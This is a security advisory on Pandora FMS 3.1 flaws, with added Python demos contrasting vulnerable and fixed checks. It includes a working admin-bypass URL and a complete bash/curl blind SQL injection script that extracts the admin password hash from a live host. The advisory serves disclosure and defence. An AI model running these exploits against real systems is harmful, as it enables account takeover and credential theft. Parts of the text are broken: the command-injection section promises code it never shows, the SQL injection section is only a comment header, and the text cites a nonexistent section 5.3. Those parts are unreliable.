Pandora FMS Authentication Bypass and Multiple Input Validation Vulnerabilities
30 Nov. 2010
Summary
Pandora Flexible Monitoring System (Pandora FMS) is vulnerable to authentication bypass, OS command injection, SQL injection, blind SQL injection and path traversal.
Credit:
The information has been provided by Juan Galiana Lara.
Vulnerable Systems:
* Pandora FMS Versions prior and including 3.1
Immune Systems:
* Pandora FMS Version 3.1.1
An attacker can execute operating system commands, inject and run remote code in the context of the application, read arbitrary files from the filesystem, and extract any data from the database, including passwords and confidential information about the monitored network and systems. It is also possible to bypass authentication or escalate privileges to admin, gaining full control of the web application and the web server. These vulnerabilities have a high impact on the confidentiality, integrity and availability of the system.
1) Authentication Bypass
An attacker can access any user account, including admin, through the "hash login" authentication process. This authentication method accepts a username and a hash computed as md5(username . $config['loginhash_pwd']). When $config['loginhash_pwd'] is empty, which is the default configuration, the expected hash is simply the MD5 of the username, so the issue can be exploited remotely by supplying a username and its MD5.
Proof of concept:
http://servername/pandora_console/index.php?loginhash_data=21232f297a57a5a743894a0e4a801fc3&loginhash_user=admin&loginhash=1
Got it! admin! :)
By default, any installation of this software allows unauthenticated attackers to perform an authentication bypass and a privilege escalation to admin.
1.1) Additionally, it is recommended to replace the weak construction md5($string . $KEY) with the hash_hmac function: HMAC is the standard keyed-hash construction, whereas MD5 over the message with the key concatenated is an ad hoc design built on a broken hash. The comparison should also use === rather than ==, so that PHP's loose type comparison is never applied to attacker-supplied input.
Snippet of code (index.php, version 3.1.1):
145 // Hash login process
(...)
150 if ($config["loginhash_pwd"] != "" && $loginhash_data == md5($loginhash_user.$config["loginhash_pwd"])) {
In line 150, use hash_hmac("sha256", $loginhash_user, $config["loginhash_pwd"]) instead of md5($loginhash_user.$config["loginhash_pwd"]).
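The following Python is an added example, not code from the advisory or from Pandora FMS. It models the three variants of the hash-login check side by side: the 3.1 behaviour described above (secret concatenated without checking that it was ever set), the 3.1.1 check that refuses an empty loginhash_pwd, and the HMAC form recommended in 1.1. The user table, the secret "s3cret" and the function names are constructed for the example; the only real value is md5("admin"), which is the loginhash_data carried by the proof-of-concept URL.

```python
import hashlib
import hmac

# Constructed user table; the real check looks the user up in tusuario.
KNOWN_USERS = {"admin", "operator"}


def forge_loginhash(user):
    # What the PoC URL carries: md5(user . ""), i.e. the MD5 of the bare username.
    return hashlib.md5(user.encode()).hexdigest()


def hash_login_3_1(user, loginhash_data, loginhash_pwd):
    # 3.1 behaviour as the advisory describes it: the secret is concatenated without
    # checking that it was ever configured, so an empty secret degenerates to
    # md5(user), which anyone can compute offline.
    expected = hashlib.md5((user + loginhash_pwd).encode()).hexdigest()
    return user in KNOWN_USERS and loginhash_data == expected


def hash_login_3_1_1(user, loginhash_data, loginhash_pwd):
    # The 3.1.1 fix shown in the snippet: hash login is disabled until a secret exists.
    if loginhash_pwd == "":
        return False
    expected = hashlib.md5((user + loginhash_pwd).encode()).hexdigest()
    return user in KNOWN_USERS and loginhash_data == expected


def hash_login_hmac(user, loginhash_data, loginhash_pwd):
    # The 1.1 recommendation: HMAC-SHA256 keyed with the secret, compared in
    # constant time instead of with a plain == on attacker-controlled input.
    if loginhash_pwd == "":
        return False
    expected = hmac.new(loginhash_pwd.encode(), user.encode(), "sha256").hexdigest()
    return user in KNOWN_USERS and hmac.compare_digest(
        loginhash_data.encode(), expected.encode())


def issue_hmac_loginhash(user, loginhash_pwd):
    # What a legitimate integrating application generates with the shared secret.
    return hmac.new(loginhash_pwd.encode(), user.encode(), "sha256").hexdigest()


if __name__ == "__main__":
    token = forge_loginhash("admin")
    print("forged loginhash_data for admin:", token)
    print("3.1   accepts it with empty secret:", hash_login_3_1("admin", token, ""))
    print("3.1.1 accepts it with empty secret:", hash_login_3_1_1("admin", token, ""))
    print("HMAC  accepts it with empty secret:", hash_login_hmac("admin", token, ""))
```

Running it shows the forged token 21232f297a57a5a743894a0e4a801fc3 logging in as admin only under the 3.1 logic; the other two variants reject it, and the HMAC variant accepts only a token derived from the configured secret.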
2) OS Command Injection - CVE-2010-4278 - CVSS 9/10
The layout parameter in file operation/agentes/networkmap.php is not properly filtered and allows an attacker to inject OS commands.
Snippet of vulnerable code (file operation/agentes/networkmap.php):
3) SQL Injection
# Pandora Flexible Monitoring System SQL Injection PoC
# Juan Galiana Lara
# Gets the list of users and passwords from the database
#
# configure cookie & host before using it
# usage
# python sqlinj_users.py
# admin:75b756ff2785ea8bb9ae02c13b6a71f1
# ...
4) Blind SQL Injection
#!/bin/bash
# Pandora Flexible Monitoring System Blind SQL Injection PoC
# Juan Galiana Lara
# Gets the md5 hash password from a specific user
#
# configure host, cookie & group_id before using it
# usage
# $ ./getpassword.sh
# 74b444ff2785ea8bb9ae02c13b6a71f1
HOST="HOST"
TARGET_USER="0x61646d696e"            # 'admin' as a MySQL hex literal, so no quotes are needed
PATTERN="Interval"                     # text present in the page only when the injected condition is true
COOKIE="rq842tci6e5ib7t918c6sv1ml4"   # PHPSESSID of an authenticated session
CHARSET=(0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z)
GROUP_ID=2
j=1
while [[ $j -lt 33 ]]; do              # one iteration per character of the 32-char MD5 hash
  i=0
  while [[ $i -lt ${#CHARSET[@]} ]]; do
    c=$(printf '%d' "'${CHARSET[$i]}")   # ASCII code of the candidate character
    URL="http://$HOST/pandora_console/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=$GROUP_ID%29%20and%20%28select%20password%20from%20tusuario%20where%20ord%28substring%28password,$j,1%29%29=$c%20and%20id_user=$TARGET_USER%29%20union%20select%20id_agente,%20nombre%20from%20tagente%20where%20id_grupo%20in%20%281"
    if curl -s "$URL" --cookie "PHPSESSID=$COOKIE" | grep -q "$PATTERN"; then
      echo -n "${CHARSET[$i]}"
      break
    fi
    i=$((i + 1))
  done
  if [[ $i -eq ${#CHARSET[@]} ]]; then
    echo "Something went wrong!"
    exit 1
  fi
  j=$((j + 1))
done
echo
exit 0
The fix for these issues in 3.1.1 was a generic filter against SQL injection applied to user input; a proper fix is planned for a major version. A generic filter is a mitigation rather than a fix: parameterized queries, or at minimum casting numeric parameters such as group_id to integer before they reach the query, are what actually removes the injection.
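To make the blind extraction and its fix concrete without a live target, here is an added Python example (not the advisory's PoC and not Pandora FMS code) that rebuilds the two tables the PoC queries, tusuario and tagente, in an in-memory SQLite database with constructed rows, runs the boolean-based character-by-character extraction against a query built the way the advisory describes (the group_id parameter pasted into the IN list), and shows the bound-parameter version rejecting the same payload. The injected condition follows the PoC's structure (close the IN list, AND a condition on tusuario, reopen the list so the trailing parenthesis still parses) but uses a clean boolean subquery; SQLite's substr/unicode stand in for MySQL's substring/ord, and the quote-free username literal 0x61646d696e becomes CAST(X'...' AS TEXT).

```python
import hashlib
import sqlite3


def build_db():
    # Constructed in-memory stand-in for the two tables the PoC touches.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE tusuario (id_user TEXT PRIMARY KEY, password TEXT);
        CREATE TABLE tagente  (id_agente INTEGER PRIMARY KEY, nombre TEXT, id_grupo INTEGER);
        INSERT INTO tagente VALUES (1, 'webserver', 2), (2, 'dbserver', 2), (3, 'router', 3);
    """)
    # Constructed admin row; the stored value is an MD5 hex digest like the real tusuario.password.
    db.execute("INSERT INTO tusuario VALUES (?, ?)",
               ("admin", hashlib.md5(b"pandora").hexdigest()))
    db.commit()
    return db


def list_agents_vulnerable(db, group_id):
    # The pattern the advisory describes: the request parameter is pasted into the SQL text.
    sql = "SELECT id_agente, nombre FROM tagente WHERE id_grupo IN (%s)" % group_id
    return db.execute(sql).fetchall()


def list_agents_fixed(db, group_id):
    # Hardened form: coerce to the expected type, then bind. int() raises on any injection attempt.
    gid = int(group_id)
    return db.execute("SELECT id_agente, nombre FROM tagente WHERE id_grupo IN (?)",
                      (gid,)).fetchall()


def fixed_rejects(db, group_id):
    try:
        list_agents_fixed(db, group_id)
    except ValueError:
        return True
    return False


def blind_extract_hash(oracle, user, length=32, charset="0123456789abcdef"):
    # Boolean-based blind extraction: the oracle answers "did the page contain rows?"
    # for one candidate character at one position, exactly as the curl/grep loop does.
    hexuser = user.encode().hex()           # quote-free username literal, as in the PoC
    recovered = ""
    for pos in range(1, length + 1):
        for ch in charset:
            condition = ("(SELECT unicode(substr(password,%d,1))=%d FROM tusuario "
                         "WHERE id_user=CAST(X'%s' AS TEXT))" % (pos, ord(ch), hexuser))
            payload = "2) AND %s AND id_grupo IN (2" % condition
            if oracle(payload):             # rows came back, so the guess is right
                recovered += ch
                break
        else:
            raise RuntimeError("no candidate matched at position %d" % pos)
    return recovered


def demo():
    # Returns (hash recovered through the oracle, hash actually stored) for comparison.
    db = build_db()
    oracle = lambda group_id: len(list_agents_vulnerable(db, group_id)) > 0
    stolen = blind_extract_hash(oracle, "admin")
    real = db.execute("SELECT password FROM tusuario WHERE id_user='admin'").fetchone()[0]
    return stolen, real


if __name__ == "__main__":
    stolen, real = demo()
    print("recovered:", stolen)
    print("matches stored hash:", stolen == real)
```

The oracle needs only a yes/no signal per request, which is why a generic keyword filter is a weak defence: the payload can be rewritten around it, whereas int(group_id) followed by a bound parameter leaves no SQL for the attacker to reach.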
5) Path Traversal
The 'page' parameter of ajax.php is not properly sanitized. The function safe_url_extraclean strips the ':' character, so the string "http://" cannot be used to build a URL, but it allows the '/' character, so an attacker can reference remote resources through a Windows UNC path of the form //servername//resource/file.
Note that the first check in safe_url_extraclean strips '://', and only the first occurrence of "protocol://", so it is trivially bypassed with http://http://url; the final preg_replace, however, strips every ':' character.
The %00 character is rejected by safe_url_extraclean, so files other than .php files cannot be included, but '.' and '/' are still allowed.
This bug is platform dependent; see
http://seclists.org/fulldisclosure/2010/Jul/137
The following only works on Windows systems. An attacker can include local files using ../ sequences because the id parameter is not filtered. If magic_quotes_gpc is Off, arbitrary files such as boot.ini can be included by appending a NULL byte (%00); otherwise only .php files can be included.
In operation/agentes/networkmap.php the 'layout' parameter is handled insecurely and is used to build the paths of files that are written and deleted. An attacker can use it to write to arbitrary paths and even remove files.
The '../' sequence can be used to write files (through the -o parameter in lines 162 and 163), to remove files (lines 157, 161 and 165) and to include them (line 178). As with 5.3, this issue is only exploitable on Windows, for the same reason.
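As an added example covering the 'page' and 'layout' handling above (not Pandora FMS code), the Python below contrasts a strip-based filter with an allowlist. strip_filter is a hypothetical model built only from the advisory's description of safe_url_extraclean (drops one "scheme://", drops NUL, drops ':'); it is not the real function, and it exists to show why the UNC, double-scheme and ../ inputs the advisory lists survive that kind of cleaning. resolve_page is the hardened alternative: a constructed allowlist of includable page names, a strict syntax check, and realpath containment under the console directory, which together reject every one of those inputs before any path is built.

```python
import os
import re


def strip_filter(page):
    # Hypothetical strip-based cleaner modelled on the advisory's description; NOT the real
    # safe_url_extraclean. Each step removes one thing and leaves everything else alone.
    page = page.replace("\x00", "")                       # NUL byte dropped
    page = re.sub(r"^[A-Za-z]+://", "", page, count=1)    # only the first "scheme://" stripped
    page = page.replace(":", "")                          # every remaining ':' dropped
    return page


# Constructed allowlist of includable console pages. In a real deployment this would be
# generated from the files that actually exist under the console directory.
ALLOWED_PAGES = {
    "operation/agentes/estado_agente",
    "operation/agentes/networkmap",
}

# Page names are path-like identifiers: word characters separated by single slashes.
# This alone excludes '..', a leading '/', '//server/share', ':' and NUL bytes.
PAGE_RE = re.compile(r"[A-Za-z0-9_]+(/[A-Za-z0-9_]+)*")


def resolve_page(base_dir, page):
    # The allowlist is the control; the syntax check and realpath containment are defence
    # in depth so that a later edit to the allowlist cannot reintroduce traversal.
    if not PAGE_RE.fullmatch(page):
        raise ValueError("page name has characters outside [A-Za-z0-9_/]")
    if page not in ALLOWED_PAGES:
        raise ValueError("page not in allowlist")
    root = os.path.realpath(base_dir)
    full = os.path.realpath(os.path.join(root, page + ".php"))
    if os.path.commonpath([root, full]) != root:
        raise ValueError("resolved path escapes the console directory")
    return full


def is_rejected(base_dir, page):
    # Convenience wrapper: True when resolve_page refuses the page name.
    try:
        resolve_page(base_dir, page)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    base = "/srv/pandora_console"      # constructed install path
    for candidate in ("//evil/share/backdoor", "http://http://evil/backdoor",
                      "../../../boot.ini", "operation/agentes/estado_agente"):
        print("%-38s strip_filter -> %-28s allowlist rejects: %s"
              % (candidate, strip_filter(candidate), is_rejected(base, candidate)))
```

The strip-based output is what then reaches include(): the UNC path and the traversal sequence are returned untouched, and the doubled scheme only loses its colon. The allowlist version never reaches the filesystem with attacker-shaped input at all, which is also why it does not depend on magic_quotes_gpc or on the operating system.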